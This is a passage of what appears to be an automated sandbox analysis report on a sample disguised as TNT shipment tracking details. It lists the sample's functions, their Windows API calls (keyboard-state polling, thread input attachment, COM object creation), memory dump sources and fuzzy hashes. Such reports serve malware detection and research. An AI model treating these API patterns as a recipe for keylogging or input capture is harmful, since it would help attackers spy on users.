                                      • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                      • VariantClear.OLEAUT32(?), ref: 00479489
                                      • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                      • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                      • VariantClear.OLEAUT32(?), ref: 004794CA
                                      • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                      • String ID:
                                      • API String ID: 2706829360-0
                                      • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                      • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                      • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                      • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                      Function 004447E0 Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 0044480E
                                      • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                      • GetKeyState.USER32(000000A0), ref: 004448AA
                                      • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                      • GetKeyState.USER32(000000A1), ref: 004448D9
                                      • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                      • GetKeyState.USER32(00000011), ref: 00444903
                                      • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                      • GetKeyState.USER32(00000012), ref: 0044492D
                                      • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                      • GetKeyState.USER32(0000005B), ref: 00444958
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: State$Async$Keyboard
                                      • String ID:
                                      • API String ID: 541375521-0
                                      • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                      • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                      • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                      • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                      Function 00470B6C Relevance: 16.6, APIs: 11, Instructions: 125COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: InitVariant$_malloc_wcscpy_wcslen
                                      • String ID:
                                      • API String ID: 3413494760-0
                                      • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                      • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                      • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                      • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                      Function 004542ED Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: AddressProc_free_malloc$_strcat_strlen
                                      • String ID: AU3_FreeVar
                                      • API String ID: 2634073740-771828931
                                      • Opcode ID: da08cc041a21d481ca46116ab47081ac4fbb3e56b80667e79e82d75b6ee56f55
                                      • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                      • Opcode Fuzzy Hash: da08cc041a21d481ca46116ab47081ac4fbb3e56b80667e79e82d75b6ee56f55
                                      • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                      Function 0046C5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoInitialize.OLE32 ref: 0046C63A
                                      • CoUninitialize.OLE32 ref: 0046C645
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                        • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                        • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                      • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                      • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                      • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                      • IIDFromString.OLE32(?,?), ref: 0046C705
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                      • API String ID: 2294789929-1287834457
                                      • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                      • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                      • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                      • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                      Function 004710F1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                        • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                        • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                        • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                      • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                      • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                      • ImageList_EndDrag.COMCTL32 ref: 00471169
                                      • ReleaseCapture.USER32 ref: 0047116F
                                      • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                      • API String ID: 2483343779-2107944366
                                      • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                      • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                      • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                      • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                      Function 004505F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                      • _wcslen.LIBCMT ref: 00450720
                                      • _wcscat.LIBCMT ref: 00450733
                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                      • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window_wcscat_wcslen
                                      • String ID: -----$SysListView32
                                      • API String ID: 4008455318-3975388722
                                      • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                      • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                      • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                      • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                      Function 00469BF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                      • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                      • GetParent.USER32 ref: 00469C98
                                      • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                      • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                      • GetParent.USER32 ref: 00469CBC
                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 2360848162-1403004172
                                      • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                      • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                      • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                      • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                      Function 0045DC4C Relevance: 15.2, APIs: 10, Instructions: 190COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                      • String ID:
                                      • API String ID: 262282135-0
                                      • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                      • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                      • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                      • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                      Function 00448123 Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                      • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                      • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                      • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                      • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                      • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend$LongWindow
                                      • String ID:
                                      • API String ID: 312131281-0
                                      • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                      • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                      • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                      • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                      Function 00448D62 Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                      • SendMessageW.USER32(753E23D0,00001001,00000000,?), ref: 00448E16
                                      • SendMessageW.USER32(753E23D0,00001026,00000000,?), ref: 00448E25
                                        • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                      • String ID:
                                      • API String ID: 3771399671-0
                                      • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                      • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                      • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                      • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                      Function 00434621 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 00434643
                                      • GetForegroundWindow.USER32(00000000), ref: 00434655
                                      • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                      • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                      • String ID:
                                      • API String ID: 2156557900-0
                                      • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                      • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                      • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                      • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                      Function 0046943F Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 287COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                      • API String ID: 0-1603158881
                                      • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                      • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                      • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                      • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                      Function 004485CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateMenu.USER32 ref: 00448603
                                      • SetMenu.USER32(?,00000000), ref: 00448613
                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                      • IsMenu.USER32(?), ref: 004486AB
                                      • CreatePopupMenu.USER32 ref: 004486B5
                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                      • DrawMenuBar.USER32 ref: 004486F5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
